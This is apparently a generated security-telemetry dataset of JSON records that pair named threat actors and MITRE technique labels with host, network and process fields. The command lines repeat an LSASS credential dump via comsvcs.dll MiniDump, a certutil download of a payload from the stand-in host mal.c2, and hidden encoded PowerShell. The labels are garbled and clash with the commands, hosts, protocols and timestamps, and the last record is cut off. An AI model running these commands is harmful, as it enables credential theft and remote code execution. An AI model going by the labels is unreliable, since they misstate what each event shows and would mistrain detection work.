{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Credential Access"],"technique_id":"T1098.004"},"event_id":"evt_fin7_20260109T144121000Z_0018341","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.183.177.200","name":"APP-WEB-X3UNBLXI2P","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18341FIN7T1098.004"},"network":{"domain":"github.com","dst_ip":"1.176.100.98","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3169 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-12-05T13:53:59.000Z","user":{"name":"azuread\\fhmk87t7j108","sid":"S-1-5-21-816884276-481450624-8517"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Initial Access"],"technique_id":"T1546.003"},"event_id":"evt_mustangpanda_20261224T172442000Z_0018343","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.46.137.241","name":"APP-WEB-7ZFTQJ99TU","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18343Mustang PandaT1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.112.66.136","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-10-18T22:46:02.000Z","user":{"name":"i-0qkqbr1y666i","sid":"S-1-5-21-761677915-310189244-8210"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Persistence","Command and Control"],"technique_id":"T1570"},"event_id":"evt_scatteredspider_20251118T112500000Z_0018345","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.98.183.241","name":"IAM-ROLE-23K6X2US79","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18345Scattered SpiderT1570"},"network":{"domain":"github.com","dst_ip":"1.179.163.136","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-05-11T09:30:39.000Z","user":{"name":"azuread\\qi86o47z70aj","sid":"S-1-5-21-467141116-932359139-3193"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Reconnaissance"],"technique_id":"T1071.001"},"event_id":"evt_volttyphoon_20260904T223006000Z_0018347","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.146.198.109","name":"APP-WEB-Y4PJ6U3P4U","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18347Volt TyphoonT1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.25.151.105","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-06-29T22:21:28.000Z","user":{"name":"svc_66zc2aa6smqq","sid":"S-1-5-21-689663305-782936214-4915"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Collection"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20250513T140231000Z_0018349","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.154.113.1","name":"IAM-ROLE-35KLWGNCCN","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18349APT41T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.37.3.80","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-11-10T05:08:04.000Z","user":{"name":"arn:aws:iam::3lurf18x98c1","sid":"S-1-5-21-217553269-910119611-3919"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Defense Evasion"],"technique_id":"T1071.001"},"event_id":"evt_mustangpanda_20260912T082104000Z_0018351","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.105.174.126","name":"DB-ORACLE-7O8UA24GVO","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18351Mustang PandaT1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.59.191.47","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-08-29T19:01:06.000Z","user":{"name":"svc_40zflhjw2fbr","sid":"S-1-5-21-503252603-773920157-8400"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Command and Control","Lateral Movement"],"technique_id":"T1021.006"},"event_id":"evt_volttyphoon_20260127T031234000Z_0018353","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.36.190.202","name":"IAM-ROLE-Z1XE2465JS","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18353Volt TyphoonT1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.136.76.38","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-12-01T17:56:28.000Z","user":{"name":"i-klyt8jqrlvt2","sid":"S-1-5-21-209756732-837253053-8459"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Discovery"],"technique_id":"T1021.006"},"event_id":"evt_apt41_20250720T084049000Z_0018355","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.106.57.140","name":"APP-WEB-H7LN8IJQ3L","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18355APT41T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.59.133.216","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-12-12T07:10:20.000Z","user":{"name":"CORP\\h7zs8q85u02w","sid":"S-1-5-21-310588058-116557661-8756"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Credential Access","Exfiltration","Reconnaissance"],"technique_id":"T1003.001"},"event_id":"evt_scatteredspider_20251014T123946000Z_0018357","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.62.157.7","name":"IAM-ROLE-T3AFPK3O6Q","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18357Scattered SpiderT1003.001"},"network":{"domain":"github.com","dst_ip":"1.66.249.11","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3240 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-10-17T13:52:50.000Z","user":{"name":"svc_bqkhrpodgjcl","sid":"S-1-5-21-274731340-813092325-3555"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Initial Access"],"technique_id":"T1003.001"},"event_id":"evt_unc4841_20250209T231708000Z_0018359","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.221.110.167","name":"AZURE-VM-E706NXPM3N","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18359UNC4841T1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.81.248.208","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-02-02T12:09:01.000Z","user":{"name":"CORP\\9lsp3i29hudj","sid":"S-1-5-21-510276582-616430014-3196"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Command and Control","Collection"],"technique_id":"T1566.001"},"event_id":"evt_fin7_20261102T082346000Z_0018361","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.181.36.174","name":"WIN-FIN-SRV-MRM1TFEUZM","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18361FIN7T1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.3.132.76","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-04-26T20:56:59.000Z","user":{"name":"i-fwjkegumenh1","sid":"S-1-5-21-137490123-230965723-2813"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Credential Access"],"technique_id":"T1484.001"},"event_id":"evt_unc4841_20250210T122906000Z_0018363","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.120.69.146","name":"EC2-INST-1AZU70SEO5","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18363UNC4841T1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.169.82.213","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-06-25T21:04:44.000Z","user":{"name":"azuread\\s9j6cli3i6it","sid":"S-1-5-21-616861309-307926569-2278"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Impact"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20260407T133939000Z_0018365","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.150.8.88","name":"WIN-FIN-SRV-ZMGAY9UCW8","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18365FIN7T1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.105.123.160","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-04-18T02:21:00.000Z","user":{"name":"arn:aws:iam::58hpxj4hulb3","sid":"S-1-5-21-148392915-132273881-1122"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Exfiltration","Command and Control"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20251127T175120000Z_0018367","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.60.15.240","name":"APP-WEB-PB8NU0ZGIG","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18367UNC4841T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.184.65.124","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3979 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-03-26T04:58:37.000Z","user":{"name":"arn:aws:iam::uh9z2pdk5htm","sid":"S-1-5-21-566248509-661238578-2258"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Initial Access"],"technique_id":"T1059.001"},"event_id":"evt_fin7_20260110T030332000Z_0018369","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.95.92.30","name":"APP-WEB-838WMJ07G6","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18369FIN7T1059.001"},"network":{"domain":"github.com","dst_ip":"1.94.158.35","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-11-12T04:03:33.000Z","user":{"name":"arn:aws:iam::xgijq5g2aulg","sid":"S-1-5-21-738894124-468103327-2837"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Command and Control","Persistence","Discovery"],"technique_id":"T1546.003"},"event_id":"evt_volttyphoon_20260207T182120000Z_0018371","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.83.244.169","name":"WIN-FIN-SRV-JP5C8LCVJI","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18371Volt TyphoonT1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.103.84.148","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-03-09T21:14:17.000Z","user":{"name":"i-82mve9k1f1in","sid":"S-1-5-21-269202945-427160411-8551"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Impact","Lateral Movement","Exfiltration"],"technique_id":"T1531"},"event_id":"evt_apt41_20260502T155107000Z_0018373","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.35.95.138","name":"WIN-FIN-SRV-1LHZWY9DCZ","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18373APT41T1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.148.228.131","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-08-25T09:36:18.000Z","user":{"name":"arn:aws:iam::ad11lt7vp5xk","sid":"S-1-5-21-117915148-770629542-4214"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Discovery","Execution","Impact"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20251126T210430000Z_0018375","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.136.188.213","name":"WIN-FIN-SRV-CY20ZMVBZN","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18375APT41T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.103.63.77","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-12-28T11:22:09.000Z","user":{"name":"CORP\\9ue8e0j07xm1","sid":"S-1-5-21-895583984-889397994-5153"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Lateral Movement","Persistence","Discovery"],"technique_id":"T1021.006"},"event_id":"evt_apt41_20250527T041718000Z_0018377","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.192.196.127","name":"AZURE-VM-R7Q71XJD7B","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18377APT41T1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.15.167.37","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"mshta.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-08-14T03:58:23.000Z","user":{"name":"azuread\\u07kamv8u06c","sid":"S-1-5-21-977128762-255308413-6230"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Privilege Escalation","Defense Evasion"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20250604T051349000Z_0018379","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.203.186.2","name":"APP-WEB-WM9KBF547C","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18379Lapsus$T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.52.101.193","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"mshta.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-06-30T04:42:04.000Z","user":{"name":"azuread\\llzesqbm3nib","sid":"S-1-5-21-501038674-511093131-8985"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Impact","Command and Control","Persistence"],"technique_id":"T1071.001"},"event_id":"evt_scatteredspider_20260912T153155000Z_0018381","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.74.11.54","name":"AZURE-VM-25DZXSHOSH","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18381Scattered SpiderT1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.65.139.70","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1572 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-06-07T23:49:45.000Z","user":{"name":"svc_v4yjhjk37bxn","sid":"S-1-5-21-199115977-743364805-3583"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Persistence","Exfiltration"],"technique_id":"T1021.006"},"event_id":"evt_apt29_20250115T090811000Z_0018383","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.2.71.107","name":"AZURE-VM-LB0GX5NB90","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18383APT29T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.94.11.240","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-09-08T13:39:51.000Z","user":{"name":"CORP\\rfan9nflxnd1","sid":"S-1-5-21-723924753-774979723-2663"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Execution","Initial Access","Credential Access"],"technique_id":"T1484.001"},"event_id":"evt_volttyphoon_20261126T163657000Z_0018385","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.102.106.215","name":"APP-WEB-RRXDYB4F82","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18385Volt TyphoonT1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.124.33.84","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1921 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-06-14T19:43:43.000Z","user":{"name":"azuread\\8fj26qdtlg3b","sid":"S-1-5-21-365687998-626963941-8711"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Execution"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20250930T004928000Z_0018387","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.235.159.157","name":"APP-WEB-C400R32NDS","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"18387FIN7T1021.006"},"network":{"domain":"github.com","dst_ip":"1.190.3.26","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 826 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"services.exe"},"source":"PowerShell Logging 